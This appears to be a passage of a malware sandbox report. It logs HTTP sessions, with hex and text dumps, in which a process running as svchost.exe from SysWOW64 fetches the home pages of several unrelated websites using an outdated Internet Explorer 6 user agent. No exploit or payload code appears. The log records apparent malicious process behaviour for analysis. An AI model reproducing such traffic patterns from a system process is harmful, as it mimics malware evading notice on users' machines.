                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: hyab.se
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:38 UTC1223INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:38 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Location: https://hyab.com
                                                                                                                                                                                                                                                                                                      Cache-Control: max-age=600
                                                                                                                                                                                                                                                                                                      Expires: Wed, 22 Mar 2023 04:55:38 GMT
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zBUN1MOqPztrTejAETx1tUpw2Hj2rZVTRTgJ0sytH1P2%2Bix8jf%2B5c1LzhHtg%2BspDoI7WgDQgvBziF9vZMSxToV4fIPZRZWqb1eDgrRDoaXZz2k2zYjG7MvKl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc94a7d1b6993-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:38 UTC1223INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:38 UTC1224INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      74192.168.2.526500104.21.65.224443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:38 UTC1224OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: hyab.com
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:38 UTC1272INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:38 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=9c62c42c282c8208d6bf2d975c91fad4; path=/
                                                                                                                                                                                                                                                                                                      Location: https://hyabmagneter.se
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BsnthAaKxyFf9aenvJOjM49n5vnm%2F503nlBpYka0sN3RC7LECPGvAjWSsdJTIEthpt7I3Uc9kDFoioCx80Lgz8ZoPrdm6Oe1T4euwEGkd9aoummDcHqGP6eZPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc94c597c365c-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:38 UTC1273INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      75192.168.2.52692035.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:39 UTC1273OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: flamingorecordings.com
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:39 UTC1273INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:39 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      SG-F-Cache: HIT
                                                                                                                                                                                                                                                                                                      X-Httpd-Modphp: 1
                                                                                                                                                                                                                                                                                                      Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                                                                      X-Proxy-Cache: HIT
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:39 UTC1273INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 65 64 67 65 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 3c 74 69 74 6c
                                                                                                                                                                                                                                                                                                      Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name='viewport' content='width=device-width, initial-scale=1.0' /><meta http-equiv='X-UA-Compatible' content='IE=edge' /><link rel="profile" href="https://gmpg.org/xfn/11" /><titl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:39 UTC1289INData Raw: 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 49 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 37 2f 31 31 2f 46 6c 61 6d 69 6e 67 6f 5f 4c 6f 67 6f 5f 53 74 69 63 6b 65 72 5f 42 69 72 64 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 20 3c 73 74 79 6c 65 20 69 64 3d 22 77 70 2d 63 75 73 74 6f 6d 2d 63 73 73 22 3e 20 2e 66 6c 2d 70 6f 73 74 2d 67 72 69 64 2d 70 6f 73 74 7b 0a 20 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0a 7d 0a 2e 72 65 6c 65 61 73 65 7b 0a 20 70 6f 73 69
                                                                                                                                                                                                                                                                                                      Data Ascii: _1200px-300x300.png" /><meta name="msapplication-TileImage" content="https://flamingorecordings.com/wp-content/uploads/2017/11/Flamingo_Logo_Sticker_Bird_1200px-300x300.png" /> <style id="wp-custom-css"> .fl-post-grid-post{ border:none;}.release{ posi
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:39 UTC1305INData Raw: 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 64 6d 69 6e 22 20 2f 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 70 72 6f 70 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 53 74 61 74 69 73 74 69 63 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 49 6e 74 65 72 61 63 74 69 6f 6e 43 6f 75 6e 74 65 72 22 3e 3c 6d
                                                                                                                                                                                                                                                                                                      Data Ascii: type="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta itemprop="name" content="admin" /></div><div itemprop="interactionStatistic" itemscope itemtype="https://schema.org/InteractionCounter"><m
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:39 UTC1321INData Raw: 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 46 6c 61 6d 69 6e 67 6f 20 52 65 63 6f 72 64 69 6e 67 73 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 70 72 6f 70 3d 22 61 75 74 68 6f 72 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69
                                                                                                                                                                                                                                                                                                      Data Ascii: temtype="https://schema.org/Organization"><meta itemprop="name" content="Flamingo Recordings"></div><div itemscope itemprop="author" itemtype="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta i
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:39 UTC1337INData Raw: 6e 62 6b 4f 58 5f 68 6c 7a 6e 72 64 42 57 48 52 77 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 79 6f 75 74 75 62 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 3c 2f 61 3e 20 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 2d 69 63 6f 6e 22 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 69 6e 73 74 61 67 72 61 6d 22 20
                                                                                                                                                                                                                                                                                                      Data Ascii: nbkOX_hlznrdBWHRw" target="_blank" rel="noopener" > <i class="fab fa-youtube" aria-hidden="true"></i> </a> </span> <span class="fl-icon"> <a href="https://www.instagram.com/flamingorecordings/" target="_blank" rel="noopener" > <i class="fab fa-instagram"


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      76192.168.2.52737691.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2267OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2283INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:46:41 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2284INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                                                      Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2299INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 44 61 74 61 20 70 75 62 6c 69 6b 61 63 6a 69 3a 20 3c 2f 73 70 61 6e 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 30 33 2e 31 30 2e 32 30 32 32 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 32 30 30 30 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f
                                                                                                                                                                                                                                                                                                      Data Ascii: <span class="sr-only">Data publikacji: </span><i class="fa fa-clock-o" aria-hidden="true"></i> 03.10.2022 </div>2000 </div> </article> </section> </section></div>... topnews. -->... co
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2315INData Raw: 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 0d 0a 31 30 30 30 0d 0a 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20
                                                                                                                                                                                                                                                                                                      Data Ascii: :10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?v=1657112618" alt="Zo1000sta jednym z nas - PRACA W POLICJI" /></a></div><div class="item" style="width:300px;
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2331INData Raw: 77 65 72 73 6a 65 20 70 6f 72 74 61 6c 75 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 77 61 69 22 20 74 69 74 6c 65 3d 22 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 22 20 63 6c 61 73 73 3d 22 77 61 69 22 3e 3c 73 70 61 6e 3e 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0d 0a 31 38 33 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                      Data Ascii: wersje portalu</h2> <a href="/w20/wai" title="wersja tekstowa" class="wai"><span>wersja tekstowa</span></a><br /> </li> </ul>183 <div class="clear"></div> </div> </div>


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      77192.168.2.52740735.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2444OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: flamingorecordings.com
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2444INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:56 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      SG-F-Cache: HIT
                                                                                                                                                                                                                                                                                                      X-Httpd-Modphp: 1
                                                                                                                                                                                                                                                                                                      Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                                                                      X-Proxy-Cache: HIT
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2444INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 65 64 67 65 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 3c 74 69 74 6c
                                                                                                                                                                                                                                                                                                      Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name='viewport' content='width=device-width, initial-scale=1.0' /><meta http-equiv='X-UA-Compatible' content='IE=edge' /><link rel="profile" href="https://gmpg.org/xfn/11" /><titl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2460INData Raw: 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 49 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 37 2f 31 31 2f 46 6c 61 6d 69 6e 67 6f 5f 4c 6f 67 6f 5f 53 74 69 63 6b 65 72 5f 42 69 72 64 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 20 3c 73 74 79 6c 65 20 69 64 3d 22 77 70 2d 63 75 73 74 6f 6d 2d 63 73 73 22 3e 20 2e 66 6c 2d 70 6f 73 74 2d 67 72 69 64 2d 70 6f 73 74 7b 0a 20 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0a 7d 0a 2e 72 65 6c 65 61 73 65 7b 0a 20 70 6f 73 69
                                                                                                                                                                                                                                                                                                      Data Ascii: _1200px-300x300.png" /><meta name="msapplication-TileImage" content="https://flamingorecordings.com/wp-content/uploads/2017/11/Flamingo_Logo_Sticker_Bird_1200px-300x300.png" /> <style id="wp-custom-css"> .fl-post-grid-post{ border:none;}.release{ posi
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2476INData Raw: 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 64 6d 69 6e 22 20 2f 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 70 72 6f 70 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 53 74 61 74 69 73 74 69 63 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 49 6e 74 65 72 61 63 74 69 6f 6e 43 6f 75 6e 74 65 72 22 3e 3c 6d
                                                                                                                                                                                                                                                                                                      Data Ascii: type="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta itemprop="name" content="admin" /></div><div itemprop="interactionStatistic" itemscope itemtype="https://schema.org/InteractionCounter"><m
